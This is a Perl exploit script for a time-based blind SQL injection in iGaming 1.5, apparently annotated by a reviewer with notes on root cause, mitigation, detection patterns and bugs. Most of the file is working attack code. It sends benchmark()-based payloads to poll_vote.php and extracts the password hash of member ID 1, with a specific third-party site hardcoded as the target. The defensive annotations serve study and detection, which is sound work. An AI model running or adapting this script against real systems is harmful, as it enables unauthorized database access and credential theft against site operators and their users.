#!/usr/bin/perl #===========================================================================================================================# # _ ____ _ _ _ _ # # __ ___ __| |__ /_ _ ___ | |_ ___| | |_____ __ _____| |__ ___ _ _ # # / _/ _ \/ _` ||_ \ '_|_ / _ | ' \/ -_) | / _ \ V V / -_) '_ \ _ / -_) || | # # \__\___/\__,_|___/_| /__| (_) |_||_\___|_|_\___/\_/\_/\___|_.__/ (_) \___|\_,_| # #===========================================================================================================================# # iGaming 1.5 Remote Blind Sql Injection Exploit # #===========================================================================================================================# # Author : Cod3rZ # #===========================================================================================================================# # Site : http://cod3rz.helloweb.eu # # Site : http://devilsnight.altervista.org # #===========================================================================================================================# # $result = $db->Execute("SELECT * FROM sp_polls_options WHERE id = '$_REQUEST[id]'"); # #===========================================================================================================================# # ?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,1,1))=48),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/* # #===========================================================================================================================# # Thanks to: the man of the greetz, DreamMark # #===========================================================================================================================# # Exploit based: Rossi46GO # # Modded by: Cod3rZ # #===========================================================================================================================# # Usage: perl ig.pl site # 
#===========================================================================================================================#
# Reviewer notes (defensive reading of this proof-of-concept):
#   * Root cause, as quoted in the header above: poll_vote.php interpolates
#     $_REQUEST[id] into a quoted SQL string, so the parameter can close the
#     quote and append its own boolean expression.
#   * Mitigation: bind `id` as a query parameter (or cast it to an integer
#     before use), run the application with a database account that cannot
#     read sp_members from the poll code path, and enforce a statement timeout.
#   * Detection: requests to /poll_vote.php whose `id` contains a quote,
#     `benchmark(`, `SUBSTRING(` or an unterminated `/*`, arriving in bursts of
#     up to 16 per character position, with individual responses above 8 s.
#   * The script declares neither `use strict` nor `use warnings`; every
#     variable below is a package global.

use LWP::UserAgent;
use HTTP::Request::Common;
use Time::HiRes;

# Shared HTTP client used by request().
$ua = LWP::UserAgent->new;

# NOTE(review): the host is a string literal, so it is always true: the
# `!$site` test below can never fire, and @ARGV is never read even though the
# usage text describes a command-line argument.
$site = "http://front-gamerz.com";
if(!$site) { &usage; }

# Candidate byte values: 48..57 are ASCII '0'..'9', 97..102 are 'a'..'f',
# i.e. the lowercase hexadecimal alphabet.
@array = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);

# Print the usage text. It only prints; it does not exit.
sub usage {
    print " Usage: perl ig.pl site \n";
    print " Ex.: perl ig.pl http://127.0.0.1 \n";
}

# Issue one GET for the URL in $_[0] and return the wall-clock seconds it took.
# $var, $start, $response, $end and $time are package globals, so this sub
# overwrites the $var and $time the main loop also uses.
sub request {
    $var = $_[0];
    $start = Time::HiRes::time();
    # HTTP::Request::Common::GET treats the pairs after the URL as headers,
    # so this sends a header named "s" whose value is the full URL; that
    # header is itself a usable signature in request logs.
    $response = $ua->request(GET $var,s => $var);
    # $! is the OS errno, not the HTTP status, so on a failed request this
    # prints whatever errno happens to hold rather than the HTTP error.
    $response->is_success() || print("$!\n");
    $end = Time::HiRes::time();
    $time = $end - $start;
    return $time
}

# Redraw the console banner. Only the fourth argument ($_[3], the value
# recovered so far) is read; the other five arguments passed by the callers
# are ignored. `cls` is a Windows shell command.
sub refresh{
    system("cls");
    print " -------------------------------------------------\n";
    print " iGaming 1.5 Remote Blind Sql Injection Exploit \n";
    print " Powered by Cod3rZ \n";
    print " http://cod3rz.helloweb.eu \n";
    print " -------------------------------------------------\n";
    print " Please Wait.. \n";
    print " Hash : " . $_[3] . " \n";
    print " -------------------------------------------------\n";
}

# Main loop: 32 character positions, 16 candidates each (at most 512 timed
# requests). 32 hexadecimal characters is consistent with an unsalted MD5
# digest; presumably that is how PASS is stored, confirm against the
# application schema. A salted, slow password hash limits what a leaked
# column value is worth.
for ($i = 1; $i < 33; $i++) {
    for ($j = 0; $j < 16; $j++) {
        # The injected condition compares one character of PASS for member
        # ID 1 with the candidate; when it matches, benchmark() keeps the
        # database busy, so the answer leaks through response time only.
        # Each matching request also ties up a database worker for the
        # duration, which is an availability concern in its own right.
        $var = $site."/poll_vote.php?id=-1' OR (SELECT IF((ASCII(SUBSTRING(`PASS`,".$i.",1))=".$array[$j]."),benchmark(200000000,CHAR(0)),0) FROM sp_members WHERE `ID`=1)/*";
        $time = request($var);
        # $host and $timedefault are never assigned in this file; refresh()
        # ignores them anyway.
        refresh($host,$timedefault,$j,$hash,$time,$i);
        # Fixed 8-second threshold: any response slower than that is taken
        # as a match for this candidate.
        if($time > 8) {
            # The request is sent a second time, but its timing is not
            # compared with anything before the character is accepted.
            $time = request($var);
            refresh($host,$timedefault,$j,$hash,$time,$i);
            $hash .= chr($array[$j]);
            refresh($host,$timedefault,$j,$hash,$time,$i);
            # Pushes $j past the loop bound to leave the inner loop.
            $j=200;
        }
    }
    # Nothing recovered for the first position: report failure and stop.
    if($i == 1 && !$hash) {
        print " Failed \n";
        print " -------------------------------------------------\n";
        die();
    }
    # After the last position, print the footer; `pause` is a Windows shell
    # command that waits for a key press.
    if($i == 32) {
        print " Exploit Terminated \n";
        print " -------------------------------------------------\n ";
        system('pause');
    }
}